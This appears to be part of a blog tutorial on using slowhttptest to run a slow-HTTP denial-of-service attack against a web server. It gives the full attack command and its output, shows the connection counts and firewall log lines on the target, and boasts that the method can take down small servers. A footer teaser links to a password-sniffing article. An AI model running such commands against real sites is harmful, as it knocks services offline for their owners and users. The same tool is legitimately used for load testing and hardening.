Interesting Articles
Home / Linux / Attack a website using slowhttptest from Linux and Mac

Attack a website using slowhttptest from Linux and Mac

in Linux September 23, 2014 7 Comments 10,947 Views

From attackers end

So, I am collection stats and attacking www.localhost.com with 1000 connections.

root@kali:~# slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://www.localhost.com -x 10 -p 3

Test output from a real slowhttptest - blackMORE Ops -2

 

Tue Sep 23 11:22:57 2014:
    slowhttptest version 1.6
 - https://code.google.com/p/slowhttptest/ -
test type:                        SLOW BODY
number of connections:            1000
URL:                              http://www.localhost.com/
verb:                             FAKEVERB
Content-Length header value:      8192
follow up data max size:          22
interval between follow up data:  110 seconds
connections per seconds:          200
probe connection timeout:         3 seconds
test duration:                    240 seconds
using proxy:                      no proxy 

Tue Sep 23 11:22:57 2014:
slow HTTP test status on 85th second:

initializing:        0
pending:             23
connected:           133
error:               0
closed:              844
service available:   YES
^CTue Sep 23 11:22:58 2014:
Test ended on 86th second
Exit status: Cancelled by user
CSV report saved to my_body_stats.csv
HTML report saved to my_body_stats.html

 

From victim server end:

rootuser@localhost [/home]# pgrep httpd | wc -l
151

Total number of httpd connections jumped to 151 within 85 seconds. (I’ve got a fast Internet!)

And of course I want to see how what’s in my /var/log/messages

rootuser@someserver [/var/log]# tail -100 message | grep Firewall

Sep 23 11:43:39 someserver: IP 1.2.3.4 (XX/Anonymous/1-2-3-4) found to have 504 connections

As you can see I managed to crank up 504 connections from a single IP in less than 85 seconds … This is more than enough to bring down a server (well most small servers and VPS’s for sure).

To make it worse, you can do it from Windows, Linux and even a Mac… I am starting to wonder whether you can do it using a jailbroken iphone6 Plus OTA (4gplus is FAST) … or a Galaxy Note 4.. I can do it using my old Galaxy Nexus (rooted) and of course good old Raspberry Pi …

 

Further reading and references

  1. Slowhttptest in Google
  2. How I knocked down 30 servers using slowhttptest
  3. Slow Read DoS attack explained
  4. Test results of popular HTTP servers
  5. How to protect against slow HTTP DoS attacks

The logo is from http://openclipart.org/detail/168031/.

Pages: 1 2

Tagged with:

7 comments

  1. Filip
    September 24, 2014 at 9:34 am

    Thanks for sharing. I’ve never heard of slowhttptest before.
    I was using apache benchmark tool (ab) for performance testing.

    • blackMORE Ops
      September 24, 2014 at 10:52 am

      Hi Flip,
      Pleasure. It was a random find in Googlecode and I liked the project for it’s potential. You can attack or use it as a benchmarking tool. (The way I see, they are both the same – just different user-intent).
      Yes, I’ve used ab too, but it wasn’t very flexible. Cheers,
      -BMO

© Copyright 2023, All Rights Reserved. | Designed by blackMORE Ops
x

Check Also

Hack website password using WireShark - darkMORE Ops -6

Hack website password using WireShark

Did you knew every time you fill in your username and password on a website ...